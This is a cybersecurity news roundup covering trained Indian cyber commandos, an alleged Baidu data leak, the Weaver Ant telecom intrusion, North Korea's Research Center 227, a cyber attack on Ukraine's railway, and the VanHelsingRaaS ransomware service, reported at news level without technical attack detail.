By Ashwani Mishra, Editor-Technology, 63SATS
The first batch of cyber commandos trained at IIIT Kottayam has completed an intensive six-month program, equipping them with skills in ethical hacking and digital forensics. Meanwhile, Baidu faces scrutiny over a data leak allegedly linked to an executive’s daughter. Chinese hacker group Weaver Ant infiltrated a telecom provider’s network for four years, using stealth techniques. North Korea has launched Research Center 227 to enhance AI-powered cyber warfare. Ukraine’s railway system suffered a major cyber-attack, disrupting ticket sales. Lastly, the newly emerged VanHelsingRaaS ransomware operation is rapidly gaining traction, targeting multiple platforms and demanding ransoms up to $500,000.
Cyber Commandos Graduate from IIIT Training Program, Ready for Deployment
A new battalion of cyber warriors has officially completed its rigorous training at the Indian Institute of Information Technology (IIIT), Kottayam. This elite group of 30 cyber commandos, selected from various state police forces across India, has undergone an intensive six-month training regimen focused on cyber defense, ethical hacking, digital forensics, and penetration testing.
The initiative, spearheaded by the Indian Cyber Crime Coordination Centre (I4C), aims to fortify India’s digital resilience. These commandos were chosen through a nationwide selection process, ensuring that only the best minds in law enforcement were entrusted with the responsibility of protecting the nation’s digital assets. A formal passing-out ceremony is set to take place in Thiruvananthapuram, marking a new chapter in India’s cybersecurity landscape.
Data Leak at Baidu Raises Privacy Concerns
Chinese tech giant Baidu is under scrutiny following reports that a high-ranking executive’s teenage daughter allegedly accessed and leaked users’ private data online. The controversy erupted after social media users accused the daughter of Baidu’s Vice President, Xie Guangjun, of sharing sensitive personal information, including phone numbers, in response to an online dispute.
The breach has fueled concerns about internal security protocols at one of China’s largest cloud service providers. In response, Baidu has categorically denied any compromise of its internal systems, asserting that its executives do not have unauthorized access to user data. The company claims that the leaked information originated from “doxing databases”—repositories of previously stolen data circulating on illicit online platforms. Baidu has since filed a police report to address the allegations and counter misinformation surrounding the incident.
Weaver Ant Hackers Spent Four Years Inside Telecom Network
A sophisticated cyber espionage campaign has come to light, revealing that the Chinese-linked hacking group Weaver Ant covertly infiltrated a major Asian telecommunications provider for over four years. The hackers leveraged compromised Zyxel CPE routers to conceal their presence and deploy multiple variants of the China Chopper backdoor, along with a newly discovered web shell dubbed ‘INMemory.’
Cybersecurity firm Sygnia, which investigated the attack, reported that Weaver Ant displayed remarkable persistence, resisting multiple attempts to remove their presence from the network. Their prolonged access enabled them to collect intelligence, manipulate data traffic, and potentially disrupt telecommunications infrastructure. This revelation underscores the growing need for advanced cybersecurity measures to counter prolonged state-sponsored cyber threats.
North Korea Expands Cyber Warfare Capabilities with Research Center 227
North Korea has intensified its focus on cyber warfare by establishing Research Center 227, a newly formed division under the military’s Reconnaissance General Bureau (RGB). This facility, operational since March 9, 2025, is dedicated to enhancing the country’s offensive cyber capabilities, with a particular emphasis on AI-driven hacking technologies.
Unlike existing RGB-affiliated institutions that focus primarily on intelligence gathering, Research Center 227 is designed to develop cutting-edge cyber attack methodologies. The center’s objectives include creating tools to bypass security defenses, advancing AI-powered cyber infiltration techniques, and automating large-scale data collection and analysis. The move signals North Korea’s commitment to expanding its cyber warfare arsenal, raising concerns among global cybersecurity agencies.
Ukraine’s Railway Network Disrupted by Major Cyber Attack
Ukraine’s railway system has become the latest target of a large-scale cyber attack, rendering online ticket purchases temporarily unavailable. Ukrzaliznytsia, the country’s national railway operator, confirmed the attack on its Telegram channel, describing it as “systematic, complex, and multi-layered.”
As a precaution, the company has temporarily suspended online ticket sales, advising passengers to purchase tickets at railway station counters, where additional staff have been deployed to manage the surge in demand. Ukrainian cybersecurity agencies, including the Cyber Department of the Security Service of Ukraine (SBU) and the Computer Emergency Response Team (CERT-UA), are actively investigating the breach and working to restore affected services. The incident highlights the growing threat to critical infrastructure posed by sophisticated cybercriminal groups.
VanHelsingRaaS: A New Ransomware Threat Emerges
A new ransomware-as-a-service (RaaS) operation, dubbed VanHelsingRaaS, has rapidly gained traction in the cybercrime ecosystem since its launch on March 7, 2025. Within two weeks of its emergence, the malware had already compromised three organizations, with ransom demands soaring as high as $500,000.
According to a report from Check Point Research (CPR), VanHelsingRaaS operates on a profit-sharing model, offering 80% of ransom payments to affiliates while retaining 20% for its operators. Affiliates must pay a $5,000 deposit to join the network, though trusted members are granted free access. The ransomware is designed to target multiple platforms, including Windows, Linux, BSD, ARM, and ESXi systems, making it a versatile and formidable threat.
Notably, VanHelsingRaaS follows the same geopolitical exclusion strategy as other Russian-linked ransomware groups, refraining from encrypting systems in Commonwealth of Independent States (CIS) countries. Its rapid spread raises alarms about the evolving sophistication of cybercriminal syndicates and the increasing risks faced by businesses worldwide.
